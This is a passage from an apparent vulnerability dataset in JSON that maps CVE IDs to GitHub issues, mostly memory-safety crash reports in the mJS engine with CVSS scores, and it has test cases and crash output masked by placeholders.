  77732. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/194",
  77733. "Repo_new": "cesanta/mjs",
  77734. "Issue_Created_At": "2021-12-31T05:36:16Z",
  77735. "description": "Heap buffer overflow APITAG in mjs_array_length. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77736. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  77737. "severity": "HIGH",
  77738. "baseScore": 7.8,
  77739. "impactScore": 5.9,
  77740. "exploitabilityScore": 1.8
  77741. },
  77742. {
  77743. "CVE_ID": "CVE-2021-46520",
  77744. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/193",
  77745. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/193",
  77746. "Repo_new": "cesanta/mjs",
  77747. "Issue_Created_At": "2021-12-31T05:35:03Z",
  77748. "description": "Heap buffer overflow APITAG in mjs_jprintf. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77749. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  77750. "severity": "HIGH",
  77751. "baseScore": 7.8,
  77752. "impactScore": 5.9,
  77753. "exploitabilityScore": 1.8
  77754. },
  77755. {
  77756. "CVE_ID": "CVE-2021-46521",
  77757. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/190",
  77758. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/190",
  77759. "Repo_new": "cesanta/mjs",
  77760. "Issue_Created_At": "2021-12-31T05:25:14Z",
  77761. "description": "Global buffer overflow PATHTAG in mjs_mk_string. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps CODETAG Test case APITAG \u200b Execution steps & Output ERRORTAG",
  77762. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  77763. "severity": "HIGH",
  77764. "baseScore": 7.8,
  77765. "impactScore": 5.9,
  77766. "exploitabilityScore": 1.8
  77767. },
  77768. {
  77769. "CVE_ID": "CVE-2021-46522",
  77770. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/196",
  77771. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/196",
  77772. "Repo_new": "cesanta/mjs",
  77773. "Issue_Created_At": "2021-12-31T05:38:16Z",
  77774. "description": "Heap buffer overflow ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77775. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  77776. "severity": "HIGH",
  77777. "baseScore": 7.8,
  77778. "impactScore": 5.9,
  77779. "exploitabilityScore": 1.8
  77780. },
  77781. {
  77782. "CVE_ID": "CVE-2021-46523",
  77783. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/198",
  77784. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/198",
  77785. "Repo_new": "cesanta/mjs",
  77786. "Issue_Created_At": "2021-12-31T05:40:39Z",
  77787. "description": "Heap buffer overflow PATHTAG in to_json_or_debug. mJS revision Commit: b1b6eac URLTAG Build steps CODETAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77788. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  77789. "severity": "HIGH",
  77790. "baseScore": 7.8,
  77791. "impactScore": 5.9,
  77792. "exploitabilityScore": 1.8
  77793. },
  77794. {
  77795. "CVE_ID": "CVE-2021-46524",
  77796. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/192",
  77797. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/192",
  77798. "Repo_new": "cesanta/mjs",
  77799. "Issue_Created_At": "2021-12-31T05:33:31Z",
  77800. "description": "Heap buffer overflow APITAG in snquote. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77801. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  77802. "severity": "HIGH",
  77803. "baseScore": 7.8,
  77804. "impactScore": 5.9,
  77805. "exploitabilityScore": 1.8
  77806. },
  77807. {
  77808. "CVE_ID": "CVE-2021-46525",
  77809. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/199",
  77810. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/199",
  77811. "Repo_new": "cesanta/mjs",
  77812. "Issue_Created_At": "2021-12-31T05:41:58Z",
  77813. "description": "Heap use after free APITAG in mjs_apply. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG Execution steps & Output ERRORTAG",
  77814. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  77815. "severity": "HIGH",
  77816. "baseScore": 7.8,
  77817. "impactScore": 5.9,
  77818. "exploitabilityScore": 1.8
  77819. },
  77820. {
  77821. "CVE_ID": "CVE-2021-46526",
  77822. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/191",
  77823. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/191",
  77824. "Repo_new": "cesanta/mjs",
  77825. "Issue_Created_At": "2021-12-31T05:31:36Z",
  77826. "description": "Global buffer overflow APITAG in snquote. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77827. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  77828. "severity": "HIGH",
  77829. "baseScore": 7.8,
  77830. "impactScore": 5.9,
  77831. "exploitabilityScore": 1.8
  77832. },
  77833. {
  77834. "CVE_ID": "CVE-2021-46527",
  77835. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/197",
  77836. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/197",
  77837. "Repo_new": "cesanta/mjs",
  77838. "Issue_Created_At": "2021-12-31T05:39:31Z",
  77839. "description": "Heap buffer overflow APITAG in mjs_get_cstring. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77840. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  77841. "severity": "HIGH",
  77842. "baseScore": 7.8,
  77843. "impactScore": 5.9,
  77844. "exploitabilityScore": 1.8
  77845. },
  77846. {
  77847. "CVE_ID": "CVE-2021-46528",
  77848. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/208",
  77849. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/208",
  77850. "Repo_new": "cesanta/mjs",
  77851. "Issue_Created_At": "2021-12-31T07:44:06Z",
  77852. "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77853. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77854. "severity": "MEDIUM",
  77855. "baseScore": 5.5,
  77856. "impactScore": 3.6,
  77857. "exploitabilityScore": 1.8
  77858. },
  77859. {
  77860. "CVE_ID": "CVE-2021-46529",
  77861. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/210",
  77862. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/210",
  77863. "Repo_new": "cesanta/mjs",
  77864. "Issue_Created_At": "2021-12-31T07:46:17Z",
  77865. "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Execution steps & Output ERRORTAG",
  77866. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77867. "severity": "MEDIUM",
  77868. "baseScore": 5.5,
  77869. "impactScore": 3.6,
  77870. "exploitabilityScore": 1.8
  77871. },
  77872. {
  77873. "CVE_ID": "CVE-2021-46530",
  77874. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/206",
  77875. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/206",
  77876. "Repo_new": "cesanta/mjs",
  77877. "Issue_Created_At": "2021-12-31T07:41:02Z",
  77878. "description": "SEGV APITAG in mjs_execute. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77879. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77880. "severity": "MEDIUM",
  77881. "baseScore": 5.5,
  77882. "impactScore": 3.6,
  77883. "exploitabilityScore": 1.8
  77884. },
  77885. {
  77886. "CVE_ID": "CVE-2021-46531",
  77887. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/211",
  77888. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/211",
  77889. "Repo_new": "cesanta/mjs",
  77890. "Issue_Created_At": "2021-12-31T07:48:04Z",
  77891. "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Execution steps & Output ERRORTAG",
  77892. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77893. "severity": "MEDIUM",
  77894. "baseScore": 5.5,
  77895. "impactScore": 3.6,
  77896. "exploitabilityScore": 1.8
  77897. },
  77898. {
  77899. "CVE_ID": "CVE-2021-46532",
  77900. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/203",
  77901. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/203",
  77902. "Repo_new": "cesanta/mjs",
  77903. "Issue_Created_At": "2021-12-31T07:34:16Z",
  77904. "description": "SEGV APITAG in exec_expr. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case1 APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Test case2 APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG Execution steps & Output ERRORTAG",
  77905. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77906. "severity": "MEDIUM",
  77907. "baseScore": 5.5,
  77908. "impactScore": 3.6,
  77909. "exploitabilityScore": 1.8
  77910. },
  77911. {
  77912. "CVE_ID": "CVE-2021-46534",
  77913. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/204",
  77914. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/204",
  77915. "Repo_new": "cesanta/mjs",
  77916. "Issue_Created_At": "2021-12-31T07:36:20Z",
  77917. "description": "SEGV APITAG in getprop_builtin_foreign. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77918. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77919. "severity": "MEDIUM",
  77920. "baseScore": 5.5,
  77921. "impactScore": 3.6,
  77922. "exploitabilityScore": 1.8
  77923. },
  77924. {
  77925. "CVE_ID": "CVE-2021-46535",
  77926. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/209",
  77927. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/209",
  77928. "Repo_new": "cesanta/mjs",
  77929. "Issue_Created_At": "2021-12-31T07:45:23Z",
  77930. "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Version: Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG Execution steps & Output ERRORTAG",
  77931. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77932. "severity": "MEDIUM",
  77933. "baseScore": 5.5,
  77934. "impactScore": 3.6,
  77935. "exploitabilityScore": 1.8
  77936. },
  77937. {
  77938. "CVE_ID": "CVE-2021-46537",
  77939. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/212",
  77940. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/212",
  77941. "Repo_new": "cesanta/mjs",
  77942. "Issue_Created_At": "2021-12-31T07:49:30Z",
  77943. "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77944. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77945. "severity": "MEDIUM",
  77946. "baseScore": 5.5,
  77947. "impactScore": 3.6,
  77948. "exploitabilityScore": 1.8
  77949. },
  77950. {
  77951. "CVE_ID": "CVE-2021-46538",
  77952. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/216",
  77953. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/216",
  77954. "Repo_new": "cesanta/mjs",
  77955. "Issue_Created_At": "2021-12-31T07:56:05Z",
  77956. "description": "SEGV APITAG in gc_compact_strings. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution steps & Output ERRORTAG",
  77957. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77958. "severity": "MEDIUM",
  77959. "baseScore": 5.5,
  77960. "impactScore": 3.6,
  77961. "exploitabilityScore": 1.8
  77962. },
  77963. {
  77964. "CVE_ID": "CVE-2021-46539",
  77965. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/217",
  77966. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/217",
  77967. "Repo_new": "cesanta/mjs",
  77968. "Issue_Created_At": "2021-12-31T07:57:19Z",
  77969. "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77970. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77971. "severity": "MEDIUM",
  77972. "baseScore": 5.5,
  77973. "impactScore": 3.6,
  77974. "exploitabilityScore": 1.8
  77975. },
  77976. {
  77977. "CVE_ID": "CVE-2021-46540",
  77978. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/214",
  77979. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/214",
  77980. "Repo_new": "cesanta/mjs",
  77981. "Issue_Created_At": "2021-12-31T07:53:19Z",
  77982. "description": "SEGV APITAG in mjs_get_mjs . mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77983. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77984. "severity": "MEDIUM",
  77985. "baseScore": 5.5,
  77986. "impactScore": 3.6,
  77987. "exploitabilityScore": 1.8
  77988. },
  77989. {
  77990. "CVE_ID": "CVE-2021-46541",
  77991. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/222",
  77992. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/222",
  77993. "Repo_new": "cesanta/mjs",
  77994. "Issue_Created_At": "2021-12-31T08:03:15Z",
  77995. "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77996. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77997. "severity": "MEDIUM",
  77998. "baseScore": 5.5,
  77999. "impactScore": 3.6,
  78000. "exploitabilityScore": 1.8
  78001. },
  78002. {
  78003. "CVE_ID": "CVE-2021-46542",
  78004. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/215",
  78005. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/215",
  78006. "Repo_new": "cesanta/mjs",
  78007. "Issue_Created_At": "2021-12-31T07:54:36Z",
  78008. "description": "SEGV APITAG in mjs_print. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  78009. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78010. "severity": "MEDIUM",
  78011. "baseScore": 5.5,
  78012. "impactScore": 3.6,
  78013. "exploitabilityScore": 1.8
  78014. },
  78015. {
  78016. "CVE_ID": "CVE-2021-46543",
  78017. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/219",
  78018. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/219",
  78019. "Repo_new": "cesanta/mjs",
  78020. "Issue_Created_At": "2021-12-31T07:59:21Z",
  78021. "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG CODETAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  78022. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78023. "severity": "MEDIUM",
  78024. "baseScore": 5.5,
  78025. "impactScore": 3.6,
  78026. "exploitabilityScore": 1.8
  78027. },
  78028. {
  78029. "CVE_ID": "CVE-2021-46544",
  78030. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/220",
  78031. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/220",
  78032. "Repo_new": "cesanta/mjs",
  78033. "Issue_Created_At": "2021-12-31T08:00:38Z",
  78034. "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Execution steps & Output ERRORTAG",
  78035. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78036. "severity": "MEDIUM",
  78037. "baseScore": 5.5,
  78038. "impactScore": 3.6,
  78039. "exploitabilityScore": 1.8
  78040. },
  78041. {
  78042. "CVE_ID": "CVE-2021-46545",
  78043. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/218",
  78044. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/218",
  78045. "Repo_new": "cesanta/mjs",
  78046. "Issue_Created_At": "2021-12-31T07:58:22Z",
  78047. "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  78048. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78049. "severity": "MEDIUM",
  78050. "baseScore": 5.5,
  78051. "impactScore": 3.6,
  78052. "exploitabilityScore": 1.8
  78053. },
  78054. {
  78055. "CVE_ID": "CVE-2021-46546",
  78056. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/213",
  78057. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/213",
  78058. "Repo_new": "cesanta/mjs",
  78059. "Issue_Created_At": "2021-12-31T07:50:54Z",
  78060. "description": "SEGV APITAG in mjs_next. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  78061. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78062. "severity": "MEDIUM",
  78063. "baseScore": 5.5,
  78064. "impactScore": 3.6,
  78065. "exploitabilityScore": 1.8
  78066. },
  78067. {
  78068. "CVE_ID": "CVE-2021-46547",
  78069. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/221",
  78070. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/221",
  78071. "Repo_new": "cesanta/mjs",
  78072. "Issue_Created_At": "2021-12-31T08:01:57Z",
  78073. "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG CODETAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  78074. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78075. "severity": "MEDIUM",
  78076. "baseScore": 5.5,
  78077. "impactScore": 3.6,
  78078. "exploitabilityScore": 1.8
  78079. },
  78080. {
  78081. "CVE_ID": "CVE-2021-46548",
  78082. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/228",
  78083. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/228",
  78084. "Repo_new": "cesanta/mjs",
  78085. "Issue_Created_At": "2021-12-31T08:09:27Z",
  78086. "description": "SEGV APITAG in add_lineno_map_item. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  78087. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78088. "severity": "MEDIUM",
  78089. "baseScore": 5.5,
  78090. "impactScore": 3.6,
  78091. "exploitabilityScore": 1.8
  78092. },
  78093. {
  78094. "CVE_ID": "CVE-2021-46549",
  78095. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/224",
  78096. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/224",
  78097. "Repo_new": "cesanta/mjs",
  78098. "Issue_Created_At": "2021-12-31T08:05:23Z",
  78099. "description": "SEGV APITAG in parse_cval_type. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Execution steps & Output ERRORTAG",
  78100. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78101. "severity": "MEDIUM",
  78102. "baseScore": 5.5,
  78103. "impactScore": 3.6,
  78104. "exploitabilityScore": 1.8
  78105. },
  78106. {
  78107. "CVE_ID": "CVE-2021-46550",
  78108. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/230",
  78109. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/230",
  78110. "Repo_new": "cesanta/mjs",
  78111. "Issue_Created_At": "2021-12-31T08:11:01Z",
  78112. "description": "SEGV APITAG in free_json_frame. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  78113. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78114. "severity": "MEDIUM",
  78115. "baseScore": 5.5,
  78116. "impactScore": 3.6,
  78117. "exploitabilityScore": 1.8
  78118. },
  78119. {
  78120. "CVE_ID": "CVE-2021-46553",
  78121. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/226",
  78122. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/226",
  78123. "Repo_new": "cesanta/mjs",
  78124. "Issue_Created_At": "2021-12-31T08:07:24Z",
  78125. "description": "SEGV APITAG in mjs_set_internal. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  78126. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78127. "severity": "MEDIUM",
  78128. "baseScore": 5.5,
  78129. "impactScore": 3.6,
  78130. "exploitabilityScore": 1.8
  78131. },
  78132. {
  78133. "CVE_ID": "CVE-2021-46554",
  78134. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/229",
  78135. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/229",
  78136. "Repo_new": "cesanta/mjs",
  78137. "Issue_Created_At": "2021-12-31T08:10:12Z",
  78138. "description": "SEGV APITAG in mjs_json_stringify. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  78139. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78140. "severity": "MEDIUM",
  78141. "baseScore": 5.5,
  78142. "impactScore": 3.6,
  78143. "exploitabilityScore": 1.8
  78144. },
  78145. {
  78146. "CVE_ID": "CVE-2021-46556",
  78147. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/227",
  78148. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/227",
  78149. "Repo_new": "cesanta/mjs",
  78150. "Issue_Created_At": "2021-12-31T08:08:18Z",
  78151. "description": "SEGV APITAG in mjs_bcode_insert_offset. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  78152. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78153. "severity": "MEDIUM",
  78154. "baseScore": 5.5,
  78155. "impactScore": 3.6,
  78156. "exploitabilityScore": 1.8
  78157. },
  78158. {
  78159. "CVE_ID": "CVE-2021-46700",
  78160. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/158",
  78161. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/158",
  78162. "Repo_new": "saitoha/libsixel",
  78163. "Issue_Created_At": "2021-11-07T11:26:43Z",
  78164. "description": "double free or corruption in .",
  78165. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78166. "severity": "MEDIUM",
  78167. "baseScore": 6.5,
  78168. "impactScore": 3.6,
  78169. "exploitabilityScore": 2.8
  78170. },
  78171. {
  78172. "CVE_ID": "CVE-2021-46701",
  78173. "Issue_Url_old": "https://github.com/PreMiD/PreMiD/issues/790",
  78174. "Issue_Url_new": "https://github.com/premid/premid/issues/790",
  78175. "Repo_new": "premid/premid",
  78176. "Issue_Created_At": "2021-12-17T21:25:29Z",
